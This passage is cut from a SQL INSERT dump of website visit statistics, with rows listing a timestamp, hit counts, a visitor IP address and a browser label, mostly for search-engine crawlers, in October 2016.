47',''),(65351,1475350677,1,1,0,0,'174.129.237.157','other'),(65352,1475351295,1,1,0,0,'164.132.161.6','other'),(65353,1475352136,1,1,0,0,'51.255.65.17','other'),(65354,1475352512,1,1,0,0,'163.172.66.90','other'),(65355,1475352548,1,1,0,0,'66.102.9.29','other'),(65356,1475352950,1,1,0,0,'163.172.64.253','other'),(65357,1475353011,1,0,1,0,'66.249.76.47',''),(65358,1475355631,1,0,1,0,'66.249.76.46',''),(65359,1475355987,1,1,0,0,'66.102.9.25','other'),(65360,1475356373,1,1,0,0,'141.8.183.25','other'),(65361,1475358169,1,1,0,0,'207.46.13.75','other'),(65362,1475359815,1,1,0,0,'66.102.9.25','other'),(65363,1475361790,1,0,1,0,'66.249.76.45',''),(65364,1475362664,1,0,1,0,'66.249.76.47',''),(65365,1475362781,1,1,0,0,'141.8.142.58','other'),(65366,1475362843,2,2,0,0,'141.8.183.25','other'),(65367,1475362914,1,0,1,0,'66.249.75.187',''),(65368,1475363417,1,1,0,0,'66.102.9.29','other'),(65369,1475363768,3,3,0,0,'141.8.183.25','other'),(65370,1475363841,2,2,0,0,'130.193.50.34','other'),(65371,1475364034,1,1,0,0,'141.8.142.85','other'),(65372,1475364103,1,1,0,0,'141.8.142.62','other'),(65373,1475364508,2,2,0,0,'130.193.51.19','other'),(65374,1475364592,1,0,1,0,'66.249.76.46',''),(65375,1475364879,1,1,0,0,'141.8.183.25','other'),(65376,1475365008,1,1,0,0,'178.154.149.10','other'),(65377,1475365328,1,1,0,0,'5.255.253.67','other'),(65378,1475366292,1,1,0,0,'40.77.167.82','other'),(65379,1475367052,1,1,0,0,'66.102.9.27','other'),(65380,1475368626,2,2,0,0,'5.9.85.4','other'),(65381,1475368713,1,1,0,0,'40.77.167.82','other'),(65382,1475370624,1,1,0,0,'66.102.9.29','other'),(65383,1475370918,1,0,1,0,'66.249.76.47',''),(65384,1475371100,4,4,0,0,'51.254.131.244','other'),(65385,1475371142,1,0,1,0,'66.249.76.45',''),(65386,1475373435,1,0,1,0,'66.249.76.46',''),(65387,1475373632,1,0,1,0,'66.249.75.187',''),(65388,1475374021,1,1,0,0,'164.132.161.16','other'),(65389,1475374228,1,1,0,0,'66.102.9.29','other'),(65390,1475374534,1,1,0,0,'163.172.66.101','other'),(65391,1475375224,1,1,0,0,'157.55.39.67','other'),(65392,1475375905,1,1,0,0,'51.255.65.81','other'),(65393,1475376563,1,1,0,0,'2.92.190.101','chrome'),(65394,1475376755,1,1,0,0,'207.46.13.75','other'),(65395,1475376796,1,0,1,0,'66.249.75.179',''),(65396,1475377106,1,1,0,0,'163.172.65.243','other'),(65397,1475377157,1,1,0,0,'163.172.66.132','other'),(65398,1475377863,1,1,0,0,'66.102.9.25','other'),(65399,1475378454,1,0,1,0,'66.249.75.183',''),(65400,1475378473,1,1,0,0,'94.179.101.30','firefox'),(65401,1475379179,1,0,1,0,'66.249.76.45',''),(65402,1475379732,1,1,0,0,'51.255.65.69','other'),(65403,1475379914,1,1,0,0,'91.196.178.38','chrome'),(65404,1475379927,1,1,0,0,'51.255.65.22','other'),(65405,1475380381,1,1,0,0,'66.102.9.29','chrome'),(65406,1475381261,1,1,0,0,'163.172.65.129','other'),(65407,1475381434,1,1,0,0,'66.102.9.25','other'),(65408,1475381863,1,0,1,0,'66.249.76.46',''),(65409,1475381877,1,1,0,0,'163.172.66.98','other'),(65410,1475382665,1,1,0,0,'163.172.66.133','other'),(65411,1475383305,1,1,0,0,'188.255.15.81','msie'),(65412,1475383455,1,1,0,0,'164.132.161.73','other'),(65413,1475384111,1,1,0,0,'51.255.65.71','other'),(65414,1475384190,1,0,1,0,'66.249.76.45',''),(65415,1475384928,1,0,1,0,'66.249.76.46',''),(65416,1475385131,1,1,0,0,'66.102.9.27','other'),(65417,1475386029,2,0,2,0,'66.249.75.187',''),(65418,1475386626,1,1,0,0,'157.55.39.153','other'),(65419,1475386902,1,1,0,0,'108.59.8.70','other'),(65420,1475387463,1,1,0,0,'163.172.66.175','other'),(65421,1475387495,1,1,0,0,'163.172.66.156','other'),(65422,1475387536,1,1,0,0,'164.132.161.54','other'),(65423,1475388232,2,0,2,0,'66.249.76.46',''),(65424,1475388443,1,0,1,0,'66.249.76.45',''),(65425,1475388513,1,1,0,0,'66.102.9.29','other'),(65426,1475388670,1,1,0,0,'163.172.66.19','other'),(65427,1475389042,1,1,0,0,'66.249.76.45','chrome'),(65428,1475389410,1,1,0,0,'163.172.64.181','other'),(65429,1475389488,1,1,0,0,'66.249.93.15','chrome'),(65430,1475390745,1,1,0,0,'180.76.15.141','other'),(65431,1475391816,1,1,0,0,'51.255.65.22','other'),(65432,1475392076,1,1,0,0,'66.102.9.27','other'),(65433,1475392515,1,1,0,0,'163.172.65.126','other'),(65434,1475393435,1,1,0,0,'5.58.46.142','chrome'),(65435,1475393592,1,1,0,0,'141.8.183.25','other'),(65436,1475393619,1,0,1,0,'66.249.76.47',''),(65437,1475393627,1,0,1,0,'66.249.75.179',''),(65438,1475395427,1,1,0,0,'51.255.65.69','other'),(65439,1475395437,1,1,0,0,'178.140.231.7','opera'),(65440,1475395558,1,1,0,0,'66.102.9.29','other'),(65441,1475395753,1,1,0,0,'91.196.178.66','chrome'),(65442,1475395984,1,0,1,0,'66.249.76.79',''),(65443,1475396150,2,2,0,0,'5.9.8.150','other'),(65444,1475397180,1,0,1,0,'66.249.75.179',''),(65445,1475397577,1,1,0,0,'51.255.65.86','other'),(65446,1475398288,1,1,0,0,'51.255.65.11','other'),(65447,1475398644,1,0,1,0,'66.249.76.45',''),(65448,1475399201,1,1,0,0,'163.172.66.167','other'),(65449,1475399214,1,1,0,0,'66.102.9.29','other'),(65450,1475399586,1,0,1,0,'66.249.76.46',''),(65451,1475399618,1,1,0,0,'164.132.161.35','other'),(65452,1475399871,2,2,0,0,'141.8.183.25','other'),(65453,1475399896,1,1,0,0,'51.255.65.81','other'),(65454,1475400351,1,1,0,0,'130.193.51.45','other'),(65455,1475400482,1,1,0,0,'93.158.152.40','other'),(65456,1475400620,1,1,0,0,'5.255.253.68','other'),(65457,1475400917,1,1,0,0,'157.55.39.67','other'),(65458,1475401342,1,0,1,0,'66.249.76.46',''),(65459,1475401353,1,1,0,0,'37.53.111.238','firefox'),(65460,1475401654,1,0,1,0,'66.249.75.187',''),(65461,1475403055,1,1,0,0,'66.102.9.29','other'),(65462,1475403558,1,0,1,0,'66.249.76.45',''),(65463,1475404872,1,0,1,0,'66.249.76.45',''),(65464,1475405153,1,1,0,0,'51.255.65.85','other'),(65465,1475406055,2,2,0,0,'144.76.29.162','other'),(65466,1475406163,1,0,1,0,'66.249.75.179',''),(65467,1475406209,2,0,2,0,'66.249.76.45',''),(65468,1475406293,1,0,1,0,'66.249.76.46',''),(65469,1475406661,1,1,0,0,'66.102.9.29','other'),(65470,1475406835,1,1,0,0,'164.132.161.11','other'),(65471,1475407047,1,1,0,0,'163.172.65.4','other'),(65472,1475407612,1,1,0,0,'163.172.66.59','other'),(65473,1475408518,1,1,0,0,'163.172.65.108','other'),(65474,1475409075,1,1,0,0,'164.132.161.72','other'),(65475,1475409521,1,0,1,0,'66.249.76.45',''),(65476,1475409972,1,1,0,0,'66.102.9.27','other'),(65477,1475410954,1,1,0,0,'163.172.65.62','other'),(65478,1475411222,1,1,0,0,'164.132.161.92','other'),(65479,1475411564,1,0,1,0,'66.249.75.183',''),(65480,1475411835,1,0,1,0,'66.249.76.45',''),(65481,1475412025,1,1,0,0,'157.55.39.67','other'),(65482,1475412376,1,0,1,0,'66.249.76.47',''),(65483,1475412445,1,0,1,0,'66.249.76.46',''),(65484,1475412716,1,1,0,0,'64.246.165.180','firefox'),(65485,1475412744,1,1,0,0,'163.172.65.204','other'),(65486,1475412799,1,1,0,0,'91.196.178.101','chrome'),(65487,1475413035,1,1,0,0,'51.255.65.3','other'),(65488,1475413246,1,1,0,0,'163.172.66.140','other'),(65489,1475413526,1,1,0,0,'66.102.9.29','other'),(65490,1475413904,1,1,0,0,'51.255.65.81','other'),(65491,1475414736,1,1,0,0,'91.196.178.162','chrome'),(65492,1475415533,1,1,0,0,'163.172.65.13','other'),(65493,1475416851,1,1,0,0,'163.172.66.73','other'),(65494,1475417169,1,1,0,0,'66.102.9.27','other'),(65495,1475418284,1,0,1,0,'66.249.75.187',''),(65496,1475418297,1,1,0,0,'164.132.161.53','other'),(65497,1475418897,1,0,1,0,'66.249.76.77',''),(65498,1475419094,1,1,0,0,'164.132.161.60','other'),(65499,1475420772,1,1,0,0,'66.102.9.27','other'),(65500,1475421781,1,0,1,0,'66.249.76.81',''),(65501,1475422438,1,1,0,0,'37.73.201.209','chrome'),(65502,1475423315,1,0,1,0,'66.249.76.47',''),(65503,1475423722,1,0,1,0,'66.249.76.46',''),(65504,1475424400,1,1,0,0,'66.102.9.25','other'),(65505,1475424666,1,1,0,0,'176.14.37.74','msie'),(65506,1475424763,1,1,0,0,'51.255.65.94','other'),(65507,1475425086,1,0,1,0,'66.249.75.187',''),(65508,1475425473,1,1,0,0,'164.132.161.20','other'),(65509,1475426332,1,1,0,0,'51.255.65.49','other'),(65510,1475426357,1,1,0,0,'51.255.65.88','other'),(65511,1475426779,1,0,1,0,'66.249.76.46',''),(65512,1475427298,1,1,0,0,'163.172.66.97','other'),(65513,1475427407,1,1,0,0,'51.255.65.21','other'),(65514,1475427703,1,1,0,0,'207.46.13.75','other'),(65515,1475427930,1,0,1,0,'66.249.76.46',''),(65516,1475428086,1,1,0,0,'66.102.9.25','other'),(65517,1475428662,1,1,0,0,'164.132.161.89','other'),(65518,1475428731,1,1,0,0,'207.46.13.75','other'),(65519,1475430023,1,1,0,0,'37.53.111.238','firefox'),(65520,1475430262,1,0,1,0,'66.249.76.79',''),(65521,1475430392,1,0,1,0,'68.180.229.34',''),(65522,1475430672,1,1,0,0,'163.172.65.47','other'),(65523,1475431575,1,1,0,0,'66.102.9.27','other'),(65524,1475431716,1,0,1,0,'66.249.76.79',''),(65525,1475431913,1,1,0,0,'163.172.66.23','other'),(65526,1475432618,1,1,0,0,'180.76.15.139','other'),(65527,1475433047,1,1,0,0,'163.172.66.146','other'),(65528,1475433842,1,1,0,0,'180.76.15.145','other'),(65529,1475434157,2,2,0,0,'195.154.233.180','chrome'),(65530,1475435180,1,1,0,0,'66.102.9.27','other'),(65531,1475435655,1,1,0,0,'91.196.178.162','chrome'),(65532,1475435689,1,1,0,0,'93.80.51.201','msie'),(65533,1475437103,1,1,0,0,'69.30.198.186','other'),(65534,1475438454,1,1,0,0,'51.255.65.45','other'),(65535,1475438778,1,1,0,0,'66.102.9.27','other'),(65536,1475438805,1,1,0,0,'207.46.13.75','other'),(65537,1475439229,1,0,1,0,'66.249.76.45',''),(65538,1475439848,1,1,0,0,'176.15.236.214','msie'),(65539,1475440919,1,0,1,0,'68.180.229.34',''),(65540,1475440957,1,1,0,0,'163.172.65.14','other'),(65541,1475441027,1,0,1,0,'68.180.229.190',''),(65542,1475442330,1,1,0,0,'66.102.9.25','other'),(65543,1475442572,1,1,0,0,'157.55.39.67','other'),(65544,1475443384,1,1,0,0,'178.255.215.94','other'),(65545,1475443892,1,1,0,0,'130.193.50.34','other'),(65546,1475445245,1,1,0,0,'207.46.13.83','other'),(65547,1475446280,1,1,0,0,'66.102.9.29','other'),(65548,1475446969,1,0,1,0,'66.249.76.47',''),(65549,1475448037,1,1,0,0,'207.46.13.75','other'),(65550,1475448046,1,1,0,0,'66.249.76.45','chrome'),(65551,1475448251,1,0,1,0,'66.249.75.183',''),(65552,1475448266,2,0,2,0,'66.249.76.46',''),(65553,1475449402,1,0,1,0,'68.180.229.34',''),(65554,1475449917,1,1,0,0,'66.102.9.25','other'),(65555,1475450266,1,0,1,0,'68.180.229.190',''),(65556,1475451631,1,0,1,0,'66.249.76.45',''),(65557,1475452327,1,0,1,0,'66.249.76.77',''),(65558,1475453354,1,1,0,0,'51.255.65.34','other'),(65559,1475453518,1,1,0,0,'66.102.9.27','other'),(65560,1475453655,1,1,0,0,'51.255.65.16','other'),(65561,1475454471,1,1,0,0,'163.172.65.234','other'),(65562,1475455623,1,1,0,0,'207.46.13.75','other'),(65563,1475455729,1,1,0,0,'163.172.66.105','other'),(65564,1475456185,1,1,0,0,'51.255.65.13','other'),(65565,1475456498,1,1,0,0,'95.221.193.231','msie'),(65566,1475457089,1,1,0,0,'66.102.9.25','other'),(65567,1475460693,1,1,0,0,'66.102.9.29','other'),(65568,1475460877,1,1,0,0,'51.255.65.89','other'),(65569,1475462332,1,1,0,0,'164.132.161.82','other'),(65570,1475463959,1,1,0,0,'66.102.9.29','other'),(65571,1475464480,1,1,0,0,'163.172.66.58','other'),(65572,1475464917,1,1,0,0,'51.255.65.62','other'),(65573,1475465124,1,1,0,0,'163.172.66.177','other'),(65574,1475465644,1,1,0,0,'163.172.65.244','other'),(65575,1475465950,1,0,1,0,'66.249.76.45',''),(65576,1475466609,1,1,0,0,'157.55.39.50','other'),(65577,1475467224,1,0,1,0,'66.249.76.47',''),(65578,1475468050,1,1,0,0,'164.132.161.21','other'),(65579,1475468735,1,1,0,0,'207.46.13.166','other'),(65580,1475468874,1,1,0,0,'163.172.66.90','other'),(65581,1475468917,1,1,0,0,'164.132.161.50','other'),(65582,1475469929,1,1,0,0,'66.249.76.45','chrome'),(65583,1475470234,1,1,0,0,'51.255.65.67','other'),(65584,1475471717,1,1,0,0,'164.132.161.16','other'),(65585,1475472460,1,1,0,0,'163.172.65.242','other'),(65586,1475473850,57,57,0,0,'46.4.116.197','other'),(65587,1475473910,1,1,0,0,'207.46.13.75','other'),(65588,1475473961,1,1,0,0,'91.196.178.66','firefox'),(65589,1475474033,1,1,0,0,'207.46.13.83','other'),(65590,1475474740,1,1,0,0,'207.46.13.166','other'),(65591,1475474778,1,1,0,0,'163.172.66.146','other'),(65592,1475474782,1,1,0,0,'66.249.93.13','chrome'),(65593,1475474849,1,1,0,0,'91.196.178.36','chrome'),(65594,1475474946,1,1,0,0,'91.196.178.71','firefox'),(65595,1475475404,1,1,0,0,'51.255.65.55','other'),(65596,1475476024,1,1,0,0,'46.211.200.146','chrome'),(65597,1475477402,1,1,0,0,'164.132.161.50','other'),(65598,1475477472,1,1,0,0,'91.196.178.66','firefox'),(65599,1475478319,1,1,0,0,'91.196.178.66','chrome'),(65600,1475478462,1,1,0,0,'92.112.58.93','firefox'),(65601,1475479287,1,1,0,0,'51.255.65.11','other'),(65602,1475479696,1,1,0,0,'94.179.1.4','chrome'),(65603,1475479848,2,2,0,0,'91.196.178.66','chrome'),(65604,1475480570,1,1,0,0,'51.255.65.62','other'),(65605,1475480584,1,1,0,0,'164.132.161.53','other'),(65606,1475480722,1,1,0,0,'174.129.237.157','other'),(65607,1475481006,1,1,0,0,'207.46.13.166','other'),(65608,1475481185,1,1,0,0,'91.196.178.66','chrome'),(65609,1475481550,1,1,0,0,'141.8.183.25','other'),(65610,1475482345,1,1,0,0,'164.132.161.84','other'),(65611,1475482412,1,1,0,0,'141.8.142.58','other'),(65612,1475482535,4,4,0,0,'69.30.198.242','other'),(65613,1475482552,1,1,0,0,'91.196.178.66','firefox'),(65614,1475482801,1,1,0,0,'207.46.13.166','other'),(65615,1475482906,1,1,0,0,'94.179.49.40','firefox'),(65616,1475482932,1,1,0,0,'51.255.65.64','other'),(65617,1475483040,1,1,0,0,'51.255.65.49','other'),(65618,1475483148,1,1,0,0,'77.222.142.148','other'),(65619,1475483265,1,1,0,0,'130.193.50.34','other'),(65620,1475483987,1,1,0,0,'141.8.183.25','other'),(65621,1475484052,1,1,0,0,'163.172.65.218','other'),(65622,1475484138,1,1,0,0,'93.158.152.61','other'),(65623,1475485198,2,2,0,0,'130.180.217.59','firefox'),(65624,1475485684,1,1,0,0,'174.129.237.157','other'),(65625,1475485708,1,1,0,0,'141.8.132.79','other'),(65626,1475486176,1,1,0,0,'94.179.56.26','firefox'),(65627,1475486597,1,0,1,0,'66.249.76.77',''),(65628,1475486719,1,1,0,0,'130.193.50.34','other'),(65629,1475487768,1,1,0,0,'51.255.65.68','other'),(65630,1475488332,1,1,0,0,'130.193.50.34','other'),(65631,1475488455,1,1,0,0,'91.196.178.66','other'),(65632,1475488533,1,1,0,0,'46.4.120.3','other'),(65633,1475488570,3,3,0,0,'149.202.54.71','other'),(65634,1475488661,1,1,0,0,'163.172.65.60','other'),(65635,1475488770,1,1,0,0,'164.132.161.22','other'),(65636,1475488869,1,1,0,0,'95.132.27.137','opera'),(65637,1475489647,1,0,1,0,'66.249.75.187',''),(65638,1475490177,1,1,0,0,'91.196.178.70','chrome'),(65639,1475491227,1,1,0,0,'91.196.178.70','chrome'),(65640,1475492076,1,1,0,0,'46.211.204.241','chrome'),(65641,1475492147,1,1,0,0,'91.196.178.71','firefox'),(65642,1475492924,1,1,0,0,'163.172.66.106','other'),(65643,1475493218,1,1,0,0,'163.172.66.104','other'),(65644,1475493460,1,1,0,0,'163.172.65.64','other'),(65645,1475493590,1,1,0,0,'109.251.244.139','chrome'),(65646,1475493697,1,1,0,0,'176.103.0.162','firefox'),(65647,1475494246,1,1,0,0,'46.174.123.231','chrome'),(65648,1475494313,1,1,0,0,'51.255.65.95','other'),(65649,1475496247,1,1,0,0,'66.249.76.45','chrome'),(65650,1475497971,1,1,0,0,'91.196.178.67','firefox'),(65651,1475498137,1,1,0,0,'157.55.39.50','other'),(65652,1475498891,1,1,0,0,'141.8.183.25','other'),(65653,1475499788,1,1,0,0,'163.172.66.125','other'),(65654,1475500767,3,0,3,0,'68.180.229.34',''),(65655,1475500993,2,2,0,0,'91.196.178.66','firefox'),(65656,1475501134,1,1,0,0,'91.196.178.66','chrome'),(65657,1475501705,1,1,0,0,'91.196.177.15','chrome'),(65658,1475501886,1,1,0,0,'94.179.114.35','chrome'),(65659,1475502041,1,1,0,0,'141.0.12.197','other'),(65660,1475502135,1,1,0,0,'178.94.41.116','chrome'),(65661,1475502311,1,1,0,0,'91.196.178.66','firefox'),(65662,1475502400,1,1,0,0,'92.113.25.28','chrome'),(65663,1475502742,1,1,0,0,'91.196.178.33','firefox'),(65664,1475503211,1,1,0,0,'194.44.127.210','chrome'),(65665,1475503891,1,1,0,0,'91.196.178.66','chrome'),(65666,1475503963,1,0,1,0,'68.180.229.34',''),(65667,1475504583,1,1,0,0,'91.196.178.71','firefox'),(65668,1475506556,1,1,0,0,'46.201.170.142','chrome'),(65669,1475508397,1,1,0,0,'180.76.15.20','other'),(65670,1475509239,1,1,0,0,'91.196.178.71','firefox'),(65671,1475509255,1,0,1,0,'66.249.76.46',''),(65672,1475509389,1,1,0,0,'95.24.120.24','msie'),(65673,1475509836,1,0,1,0,'66.249.76.45',''),(65674,1475509954,1,1,0,0,'178.92.249.12','firefox'),(65675,1475510140,1,0,1,0,'66.249.76.47',''),(65676,1475514088,1,0,1,0,'66.249.76.45',''),(65677,1475516138,1,1,0,0,'46.219.255.206','chrome'),(65678,1475516235,1,1,0,0,'37.53.111.238','firefox'),(65679,1475516469,1,1,0,0,'109.251.188.107','chrome'),(65680,1475517962,1,1,0,0,'163.172.65.192','other'),(65681,1475518655,1,1,0,0,'163.172.66.52','other'),(65682,1475518951,1,1,0,0,'163.172.65.112','other'),(65683,1475519111,1,1,0,0,'176.193.248.218','msie'),(65684,1475520291,1,1,0,0,'51.255.65.19','other'),(65685,1475520373,1,1,0,0,'130.193.50.4','other'),(65686,1475520410,1,1,0,0,'5.255.253.53','other'),(65687,1475520592,1,1,0,0,'164.132.161.71','other'),(65688,1475521324,1,1,0,0,'51.255.65.91','other'),(65689,1475521325,1,1,0,0,'164.132.161.12','other'),(65690,1475521411,1,1,0,0,'164.132.161.5','other'),(65691,1475521549,1,1,0,0,'164.132.161.27','other'),(65692,1475521735,1,1,0,0,'207.46.13.2','other'),(65693,1475522281,1,1,0,0,'163.172.65.252','other'),(65694,1475523126,1,1,0,0,'163.172.65.5','other'),(65695,1475523129,1,1,0,0,'163.172.65.56','other'),(65696,1475524106,3,3,0,0,'207.46.13.2','other'),(65697,1475525232,1,1,0,0,'51.255.65.47','other'),(65698,1475525725,1,1,0,0,'163.172.65.241','other'),(65699,1475527333,1,1,0,0,'163.172.65.116','other'),(65700,1475527919,1,0,1,0,'66.249.76.45',''),(65701,1475528326,1,1,0,0,'164.132.161.77','other'),(65702,1475529878,1,1,0,0,'164.132.161.53','other'),(65703,1475530593,1,1,0,0,'163.172.66.31','other'),(65704,1475530779,1,1,0,0,'163.172.66.18','other'),(65705,1475530962,1,1,0,0,'163.172.65.45','other'),(65706,1475531049,1,1,0,0,'164.132.161.40','other'),(65707,1475531190,1,1,0,0,'163.172.64.220','other'),(65708,1475531508,1,1,0,0,'163.172.65.227','other'),(65709,1475532597,1,1,0,0,'163.172.66.156','other'),(65710,1475532712,1,0,1,0,'66.249.76.47',''),(65711,1475532973,1,1,0,0,'163.172.66.72','other'),(65712,1475533119,1,1,0,0,'163.172.66.79','other'),(65713,1475533483,1,1,0,0,'51.255.65.57','other'),(65714,1475533797,1,1,0,0,'66.249.76.46','chrome'),(65715,1475533862,1,1,0,0,'51.255.65.78','other'),(65716,1475534020,1,1,0,0,'164.132.161.80','other'),(65717,1475535045,1,1,0,0,'163.172.66.111','other'),(65718,1475535209,3,3,0,0,'69.30.211.2','other'),(65719,1475535570,1,1,0,0,'164.132.161.52','other'),(65720,1475535635,1,1,0,0,'51.255.65.14','other'),(65721,1475535675,1,1,0,0,'51.255.65.30','other'),(65722,1475536309,1,1,0,0,'176.195.101.79','other'),(65723,1475536323,1,1,0,0,'163.172.66.183','other'),(65724,1475536556,1,1,0,0,'51.255.65.89','other'),(65725,1475536585,1,1,0,0,'163.172.65.200','other'),(65726,1475536998,1,1,0,0,'207.46.13.83','other'),(65727,1475537018,1,1,0,0,'51.255.65.42','other'),(65728,1475538234,1,1,0,0,'163.172.65.20','other'),(65729,1475538339,1,0,1,0,'66.249.76.45',''),(65730,1475538356,1,1,0,0,'164.132.161.34','other'),(65731,1475538396,1,1,0,0,'163.172.65.5','other'),(65732,1475538778,1,1,0,0,'51.255.65.2','other'),(65733,1475539101,1,1,0,0,'163.172.65.243','other'),(65734,1475539561,1,1,0,0,'51.255.65.88','other'),(65735,1475539980,1,0,1,0,'66.249.69.155',''),(65736,1475540675,1,1,0,0,'51.255.65.58','other'),(65737,1475540942,4,4,0,0,'163.172.32.175','other'),(65738,1475541324,1,1,0,0,'164.132.161.63','other'),(65739,1475541359,1,1,0,0,'163.172.65.2','other'),(65740,1475541851,1,1,0,0,'163.172.65.47','other'),(65741,1475542736,1,1,0,0,'163.172.66.183','other'),(65742,1475543148,1,1,0,0,'163.172.64.222','other'),(65743,1475543394,1,1,0,0,'163.172.66.167','other'),(65744,1475543769,1,1,0,0,'163.172.64.188','other'),(65745,1475544303,1,0,1,0,'66.249.76.81',''),(65746,1475544856,2,2,0,0,'207.46.13.2','other'),(65747,1475545970,1,1,0,0,'207.46.13.166','other'),(65748,1475546151,1,1,0,0,'164.132.161.74','other'),(65749,1475546348,1,1,0,0,'164.132.161.88','other'),(65750,1475546576,1,1,0,0,'51.255.65.25','other'),(65751,1475548070,1,1,0,0,'164.132.161.39','other'),(65752,1475548728,1,1,0,0,'164.132.161.41','other'),(65753,1475548738,1,1,0,0,'88.25.203.111','firefox'),(65754,1475548975,1,1,0,0,'163.172.64.228','other'),(65755,1475549108,1,1,0,0,'163.172.65.233','other'),(65756,1475549396,1,0,1,0,'66.249.76.46',''),(65757,1475549415,1,0,1,0,'66.249.76.79',''),(65758,1475549717,1,1,0,0,'51.255.65.28','other'),(65759,1475551152,1,1,0,0,'95.221.243.145','firefox'),(65760,1475551708,1,1,0,0,'163.172.65.66','other'),(65761,1475552359,1,1,0,0,'164.132.161.81','other'),(65762,1475552559,1,1,0,0,'66.102.9.25','chrome'),(65763,1475553272,1,0,1,0,'68.180.229.114',''),(65764,1475553744,1,0,1,0,'66.249.76.46',''),(65765,1475554236,1,1,0,0,'51.255.65.41','other'),(65766,1475554399,1,1,0,0,'163.172.65.58','other'),(65767,1475554975,1,1,0,0,'180.76.15.136','other'),(65768,1475555279,1,1,0,0,'163.172.65.61','other'),(65769,1475555518,5,5,0,0,'94.154.239.69','other'),(65770,1475555603,1,1,0,0,'180.76.15.20','other'),(65771,1475555883,1,1,0,0,'164.132.161.63','other'),(65772,1475556338,1,1,0,0,'188.255.59.142','msie'),(65773,1475556537,1,0,1,0,'66.249.75.183',''),(65774,1475557290,1,1,0,0,'163.172.65.68','other'),(65775,1475557292,1,1,0,0,'163.172.65.239','other'),(65776,1475557478,2,2,0,0,'91.20.25.20','other'),(65777,1475557682,1,0,1,0,'68.180.229.190',''),(65778,1475557872,1,1,0,0,'207.46.13.2','other'),(65779,1475557883,1,1,0,0,'51.255.65.57','other'),(65780,1475558398,1,1,0,0,'46.242.76.106','chrome'),(65781,1475560280,2,2,0,0,'62.210.148.247','other'),(65782,1475561466,1,1,0,0,'91.196.178.66','firefox'),(65783,1475562365,1,1,0,0,'128.68.202.159','msie'),(65784,1475563591,1,1,0,0,'66.249.93.13','chrome'),(65785,1475564257,1,1,0,0,'93.73.234.193','firefox'),(65786,1475564472,1,1,0,0,'66.249.75.187','chrome'),(65787,1475565084,1,1,0,0,'163.172.65.4','other'),(65788,1475565927,1,1,0,0,'91.196.178.70','firefox'),(65789,1475566010,1,1,0,0,'62.122.204.43','chrome'),(65790,1475566296,1,1,0,0,'5.255.250.41','other'),(65791,1475566836,1,1,0,0,'51.255.65.6','other'),(65792,1475567278,1,1,0,0,'87.76.247.74','chrome'),(65793,1475567338,1,1,0,0,'91.196.178.66','firefox'),(65794,1475567401,1,1,0,0,'66.249.69.155','chrome'),(65795,1475567541,1,1,0,0,'163.172.65.226','other'),(65796,1475567794,1,0,1,0,'68.180.229.114',''),(65797,1475568858,1,1,0,0,'51.255.65.84','other'),(65798,1475568891,1,1,0,0,'180.76.15.141','other'),(65799,1475568914,1,1,0,0,'51.255.65.88','other'),(65800,1475569309,1,0,1,0,'66.249.75.183',''),(65801,1475571005,1,1,0,0,'51.255.65.68','other'),(65802,1475571539,1,1,0,0,'51.255.65.77','other'),(65803,1475572140,1,1,0,0,'217.66.100.163','chrome'),(65804,1475572476,1,0,1,0,'66.249.75.179',''),(65805,1475573402,1,1,0,0,'163.172.65.252','other'),(65806,1475573462,1,1,0,0,'109.173.22.201','chrome'),(65807,1475573601,1,1,0,0,'91.196.179.138','firefox'),(65808,1475573648,1,1,0,0,'207.46.13.2','other'),(65809,1475574022,1,1,0,0,'130.180.208.253','chrome'),(65810,1475574455,1,1,0,0,'91.196.178.67','chrome'),(65811,1475574523,1,1,0,0,'91.196.178.70','firefox'),(65812,1475574711,1,1,0,0,'91.196.178.66','firefox'),(65813,1475574762,1,1,0,0,'163.172.66.66','other'),(65814,1475575403,1,1,0,0,'163.172.66.74','other'),(65815,1475575824,1,1,0,0,'163.172.64.182','other'),(65816,1475576165,1,1,0,0,'91.196.178.68','firefox'),(65817,1475576182,1,1,0,0,'51.255.65.37','other'),(65818,1475576713,1,0,1,0,'66.249.76.46',''),(65820,1475576730,1,1,0,0,'91.196.178.67','chrome'),(65821,1475577125,1,1,0,0,'130.193.50.34','other'),(65822,1475577591,1,1,0,0,'163.172.66.126','other'),(65823,1475577625,1,1,0,0,'141.8.142.58','other'),(65824,1475578158,1,1,0,0,'37.54.23.58','opera'),(65825,1475578784,1,1,0,0,'182.71.126.206','firefox'),(65826,1475578820,1,1,0,0,'95.134.96.191','chrome'),(65827,1475579185,1,1,0,0,'163.172.66.167','other'),(65828,1475579290,1,1,0,0,'5.255.250.41','other'),(65829,1475579292,1,1,0,0,'141.8.183.25','other'),(65830,1475579378,1,1,0,0,'51.255.65.55','other'),(65831,1475579931,1,1,0,0,'51.255.65.88','other'),(65832,1475580958,1,0,1,0,'66.249.75.179',''),(65833,1475581073,1,1,0,0,'163.172.66.78','other'),(65834,1475581200,1,1,0,0,'163.172.65.59','other'),(65835,1475582412,1,0,1,0,'66.249.76.46',''),(65836,1475582667,1,0,1,0,'66.249.76.47',''),(65837,1475582714,1,1,0,0,'84.213.178.51','other'),(65838,1475583043,1,1,0,0,'93.183.215.105','chrome'),(65839,1475583343,1,1,0,0,'130.193.50.34','other'),(65840,1475583500,1,1,0,0,'176.111.33.18','firefox'),(65841,1475583545,1,1,0,0,'91.196.178.66','chrome'),(65842,1475584089,1,1,0,0,'163.172.64.249','other'),(65843,1475584182,1,1,0,0,'94.179.51.222','firefox'),(65844,1475584667,1,1,0,0,'164.132.161.85','other'),(65845,1475584763,1,1,0,0,'46.242.78.39','other'),(65846,1475584788,1,1,0,0,'51.255.65.24','other'),(65847,1475584918,1,1,0,0,'94.179.122.229','chrome'),(65848,1475584969,1,1,0,0,'91.196.178.66','chrome'),(65849,1475585107,1,1,0,0,'94.179.51.222','firefox'),(65850,1475585114,5,5,0,0,'46.4.120.3','other'),(65851,1475585261,1,1,0,0,'91.196.178.66','firefox'),(65852,1475585296,1,0,1,0,'68.180.229.114',''),(65853,1475585585,1,1,0,0,'91.196.179.138','firefox'),(65854,1475586156,1,1,0,0,'164.132.161.47','other'),(65855,1475586464,1,1,0,0,'163.172.65.180','other'),(65856,1475586479,3,3,0,0,'130.193.50.34','other'),(65857,1475586695,1,1,0,0,'51.255.65.90','other'),(65858,1475586834,1,1,0,0,'130.193.51.19','other'),(65859,1475587175,1,1,0,0,'141.8.183.25','other'),(65860,1475587326,1,1,0,0,'164.132.161.60','other'),(65861,1475587838,1,1,0,0,'91.196.178.69','chrome'),(65862,1475587949,1,1,0,0,'163.172.66.79','other'),(65863,1475588829,1,1,0,0,'164.132.161.69','other'),(65864,1475589010,1,1,0,0,'163.172.66.152','other'),(65865,1475